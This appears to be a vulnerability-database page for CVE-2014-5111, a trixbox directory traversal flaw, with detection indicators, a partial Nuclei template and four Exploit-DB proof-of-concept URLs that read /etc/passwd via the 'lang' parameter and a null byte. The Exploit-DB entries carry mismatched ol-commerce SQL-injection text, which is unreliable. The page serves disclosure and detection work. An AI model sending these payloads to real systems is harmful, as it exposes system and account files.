CVE-2014-5111
published 2014-07-28CVE-2014-5111: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1)…
PriorityP341medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
21.24%
97.3th percentile
Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
Detection & IOCsextracted from sources · hover to see the quote
- →Detect LFI exploitation attempts by monitoring HTTP GET requests to trixbox maint module PHP files containing directory traversal sequences (../../../../) in the 'lang' parameter, particularly targeting /etc/passwd with a null byte (%00) terminator. ↗
- →Successful exploitation produces a response body containing Unix /etc/passwd content; match response body against the pattern 'root:.*:0:0:' to confirm file read. ↗
- →The null byte (%00) appended to the traversal payload is used to truncate the file extension appended by the application; monitor for URL-encoded null bytes in query string parameters on these endpoints. ↗
- ·The null byte truncation technique (%00) requires that the PHP installation has not disabled null byte handling; this attack vector is only effective on PHP versions prior to 5.3.4 where null byte poisoning in file paths was fixed. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Fonality trixbox - 'endpointcfg.php' Directory Traversal
exploitdb·2014-07-17
CVE-2014-5111 Fonality trixbox - 'endpointcfg.php' Directory Traversal
Fonality trixbox - 'endpointcfg.php' Directory Traversal
---
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
Http://www.example.com/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
Exploit-DB
Fonality trixbox - 'repo.php' Directory Traversal
exploitdb·2014-07-17
CVE-2014-5111 Fonality trixbox - 'repo.php' Directory Traversal
Fonality trixbox - 'repo.php' Directory Traversal
---
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
Http://www.example.com/maint/modules/repo/repo.php?lang=../../../../../../../../etc/passwd%00
Exploit-DB
Fonality trixbox - 'asterisk_info.php' Directory Traversal
exploitdb·2014-07-17
CVE-2014-5111 Fonality trixbox - 'asterisk_info.php' Directory Traversal
Fonality trixbox - 'asterisk_info.php' Directory Traversal
---
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
Http://www.example.com/maint/modules/asterisk_info/asterisk_info.php?lang=../../../../../../../../etc/passwd%00
Exploit-DB
Fonality trixbox - 'index.php' Directory Traversal
exploitdb·2014-07-17
CVE-2014-5111 Fonality trixbox - 'index.php' Directory Traversal
Fonality trixbox - 'index.php' Directory Traversal
---
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
Http://www.example.com/maint/modules/home/index.php?lang=../../../../../../../../etc/passwd%00
Nuclei
Fonality trixbox - Local File Inclusion
nuclei·CVSS 5.0
CVE-2014-5111 [MEDIUM] Fonality trixbox - Local File Inclusion
Fonality trixbox - Local File Inclusion
Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
Template:
id: CVE-2014-5111
info:
name: Fonality trixbox - Local File Inclusion
author: daffainfo
severity: medium
description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
impact: |
An attacker can exploit this vulnerability t
2014-07-28
Published